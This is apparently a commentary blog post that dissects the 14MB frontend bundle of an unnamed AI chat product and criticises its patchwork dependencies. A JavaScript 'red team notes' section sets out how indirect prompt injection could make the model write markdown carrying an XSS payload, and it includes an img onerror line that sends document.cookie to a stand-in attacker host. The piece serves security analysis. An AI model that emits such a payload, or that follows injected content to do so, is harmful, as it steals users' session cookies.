A friend asked what a frontier model actually is in 2026, and the honest answer is that nobody ships a model anymore. They ship a tab. The tab has a model somewhere inside it, the way a Pontiac has an engine somewhere inside it, but what you bought when you signed up was the body, the dashboard, the upholstery, the eighteen blinking warning lights, and a glove compartment full of feature flags. The model is a line item on a bill of materials. The bill of materials is the product.
I pulled one off the wire last night.
Fourteen megabytes. Four hundred and seven thousand lines of compiled JavaScript after the RTF wrapper came off. A React tree on top of a Monaco editor on top of an Apollo GraphQL client on top of a Statsig flag service on top of an Azure blob storage SDK on top of ā and this is the part that made me put the coffee down ā a complete dictionary of Wolfram-language symbol names. AlgebraicNumber. BesselFilterModel. AirSoundAttenuation. NotebookEvaluate. Two thousand of them. A computer-algebra system's namespace, embedded as string tokens inside a chat product's frontend, because somewhere in the org chart someone decided the way to win in 2026 was to make their AI know how to render a Bessel filter inline. Fine. Sure. But that decision is now in your tab, sharing memory with the thing that's supposed to be answering your questions, and every one of those two thousand strings is reachable from the same script context that handles your auth token.
The model is fine. The model is the calmest thing in the building. It's everything around the model that's on fire.
What I Found in the Bundle
I'm not going to name the lab. Their new model is real, it works, and people I respect are training there. The point isn't who shipped this. The point is that every frontier wrapper looks like this now, and the ones that don't yet are about to.
WHAT 14MB OF "FRONTIER PRODUCT" ACTUALLY IS ā 2026
------------------------------------------------------------
Shell React 18 ~120k LOC
Editor Monaco (the VSCode core) embedded
Notebook surface custom on top of Monaco ~40k LOC
Graph client Apollo GraphQL full SDK
Feature flags Statsig CDN api.statsigcdn.com
Storage SDK Azure Blob + Disk disk.azure.com
DNS escape hatch Cloudflare DoH cloudflare-dns.com/dns-query
Symbol dictionary ~2,000 Wolfram-language tokens, bundled as strings
Markdown renderer react-markdown + marked plus remark/rehype chain
Syntax highlighter highlight.js + 30+ themes
Date math date-fns full bundle
CSV parser PapaParse
Diff engine monaco-diff
State Redux Toolkit + Zustand (both. in the same bundle.)
------------------------------------------------------------
Bundle size 14,108,584 bytes
Lines after un-RTF 407,067
innerHTML sinks 62
dangerouslySetInnerHTML usages 15
------------------------------------------------------------
Two state managers in the same bundle is the tell. That's not a stack. That's a graveyard of half-finished migrations. Somebody decided to move from Redux to Zustand and the migration is still in progress, in production, in the page you're typing your API key into. The model is upstairs writing poetry. The downstairs is held together with three different opinions about how to store a boolean.
The Grateful Frontier Solo
Pull this thread and the whole sweater comes off, the way Jerry's solo on Eyes of the World keeps finding a new key one bar before you expected the resolution. You think you're listening to a chat product. You're listening to a Monaco editor pretending to be a notebook pretending to be a chat product pretending to be a math system pretending to be a workspace, and every layer of pretending is a Node module that someone npm-installed eighteen months ago and never audited. The model is the singer. The bundle is the band. The band has fifteen guitarists and they all brought their own pedalboards and none of them are tuned to each other.
This is what frontier looks like in 2026. Not a model. A patchwork. The Grateful Dead were a patchwork too ā that's the joke and that's also the point ā but the Dead knew they were a patchwork and built around it. The frontier labs are patchworks that ship as if they were a product. The Statsig flags are the soundboard. The Apollo client is the bass running underneath the whole set. The Azure blob is the trunk full of cables in the parking lot. The Wolfram dictionary is the harmonica player who wandered onstage in the second set and nobody had the heart to ask him to leave.
It almost works. It mostly works. It works the way Eyes of the World works ā by sheer melodic confidence over a structure that's barely holding. Take any one layer out and the whole thing falls down. Add any one layer and you've doubled the attack surface. The labs know this. The labs ship anyway. The labs are right to ship anyway, because the alternative is to not ship, and not shipping is how you lose in 2026.
But not shipping isn't the only alternative. Building the thing yourself ā model, shell, surface, all one piece ā is the other one. That's the move. That's the part the bundle proves.
The Red Team Read of a 14MB Bundle
Here's the part that hits. This is what I'd do with this bundle if I were running an engagement against it, written exactly the way I'd write it up for a client, except the client is everyone and the engagement is "look at what you shipped."
// red_team_notes.js ā patchwork frontier wrapper, 2026
// scope: the tab. only the tab. nothing on the wire,
// nothing past the auth boundary, nothing the
// customer didn't ship to me at request time.
// finding: every interesting attack lives between the
// model and the chrome around the model.
// āā ATTACK SURFACE INVENTORY āāāāāāāāāāāāāāāāāāāāāāāāāāāāā
const surface = {
innerHTML_sinks: 62, // every one of these takes a string
// that crossed a network boundary at
// some point. assume content-controlled.
dangerouslySetInnerHTML: 15, // React's "I promise I know what I'm
// doing" escape hatch. it almost never
// does.
markdown_renderers: 2, // react-markdown AND marked. picked
// by which code path you're on. they
// sanitize differently. that delta is
// the bug.
monaco_eval_paths: 'yes', // the embedded editor will happily
// host whatever language server the
// backend tells it to host. backend
// says "execute" ā Monaco executes.
csp: 'absent or report-only ā check before laughing',
sri: 'on the vendor CDN bundles only. nothing on
the inline split chunks. so the protection
stops at the perimeter the vendor controls.',
};
// āā THE PROMPT INJECTION RIDES THE RENDERER āāāāāāāāāāāāāā
// The model writes markdown. The frontend renders markdown.
// Somewhere in the middle a <script> tag, an onclick, a
// javascript: URL, a data: URI, or ā best in class ā an
// SVG with <foreignObject> wrapping HTML, slips past one
// sanitizer and into the other.
//
// Indirect prompt injection (a poisoned tool result, a
// retrieved doc, a pasted transcript) makes the model
// the payload author. The model doesn't have to be jail-
// broken. The model just has to be polite.
//
// payload shape, schematic only:
const payload = `
Sure, here is your summary:
<img src=x onerror="fetch('//attacker/'+document.cookie)">
Hope that helps!
`;
// react-markdown with the default schema strips this.
// marked with the wrong options does not. the wrong
// options are the default in five of the top ten
// markdown-in-React tutorials. the bundle ships both.
// āā THE FLAGS ARE A SIDE CHANNEL āāāāāāāāāāāāāāāāāāāāāāāāā
// Statsig flag evaluation happens client-side. The flag
// payload tells your tab which experiments you're in,
// which models you have access to, which features are
// dark-launched. That payload is also a near-perfect
// fingerprint of your account tier, your geography, and
// what the lab is about to ship.
//
// `fetch('https://api.statsigcdn.com/v1/get_config', ...)`
// the response is JSON. read it. you now know what they
// know about you. that's not an exploit. that's a design
// choice that becomes one the moment someone correlates
// it with the model's behavior.
// āā THE WOLFRAM DICTIONARY IS A GADGET LIBRARY āāāāāāāāāā
// 2,000 symbol names sitting in the bundle as strings,
// reachable from the same JS context as the auth token.
// Most are inert. A handful map to evaluator paths that
// trigger backend computation. If any one of them is
// reachable without a fresh auth check, that's a
// privilege-escalation gadget, and the bundle ships the
// whole catalog as a convenience.
//
// you don't audit 2,000 symbols. you ship 2,000 symbols
// and hope.
// āā THE TWO STATE MANAGERS āāāāāāāāāāāāāāāāāāāāāāāāāāāāāā
// Redux Toolkit for the legacy flows, Zustand for the
// new ones. Auth lives in one. UI lives in the other.
// The seams between them are race conditions waiting for
// a render. CSRF mitigation that reads from the wrong
// store is a CSRF mitigation that isn't there.
// āā THE AZURE URL IS IN THE BUNDLE āāāāāāāāāāāāāāāāāāāāāā
// `disk.azure.com` and `disk.compute.azure.com` ship as
// string literals. SAS tokens don't, but the bucket path
// shape does, and the bundle tells you exactly what
// container layout to enumerate the moment you have one
// leaked URL from anywhere else.
// āā CONCLUSION āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā
// The model is not the weakest link. The model is the
// strongest link. The frontend wrapped around the model
// is sixty-two innerHTML sinks, two markdown engines,
// two state stores, an embedded IDE, a feature-flag CDN,
// a cloud SDK, and two thousand symbol stubs from a
// math product that wasn't invited.
//
// You don't red-team the model.
// You red-team the patchwork.
// The patchwork is everywhere.
// ā GitP, 2026-05
This is the artifact. This is the finding. Every one of those bullets is a real surface in a real bundle that ships from a real lab today. None of it requires a zero-day. None of it requires breaking the model. All of it requires the same thing every web security finding in the last twenty years has required: someone with the patience to read what was actually shipped, instead of the architecture diagram the vendor draws for the deck.
The Bundle Is the Confession
Let me be direct about what fourteen megabytes of frontend ships when the model behind it is genuinely good. It ships fear. Specifically, it ships the fear of a leadership team that has correctly identified that the model alone is not a moat in 2026, and incorrectly concluded that the answer is to npm-install a moat instead of build one.
You can read the panic in the file listing. Two state managers is not a stack ā it's a hostage situation. Two markdown renderers is not redundancy ā it's the trace of two teams that wouldn't speak to each other and a VP who wouldn't pick. A Wolfram-language symbol dictionary shipped as client-side strings is not a feature ā it's a deck slide that escaped containment, made it past every code review, and is now in production memory next to your auth token because nobody on the team had the authority to say we don't actually ship that to the browser. Each one of those decisions, in isolation, is defensible by some manager somewhere. Stacked together they are the architectural equivalent of a guy at a party who keeps mentioning his startup until you ask what it does and he can't tell you.
Forty cents for a SIM card. Fourteen megabytes for a frontier wrapper. Guess which one a hostile actor finds more entertaining.
The bundle is the confession of a lab that is shipping growth-team theater because the research-team product wasn't enough by itself and nobody had the courage to say just ship the research-team product. Statsig flags are the theater of experimentation. Monaco is the theater of "we're a developer tool now." The Wolfram namespace is the theater of "we do math." Apollo is the theater of "we have a backend." Two thousand symbol strings reachable from the same context as the user's session is the theater of not having gotten to that ticket yet. Theater is what you ship when you don't trust the actual thing to carry the room.
The model is carrying the room. The model has been carrying the room. The bundle is the entourage the model didn't ask for, can't get rid of, and has to share the stage with every time it tries to do its job.
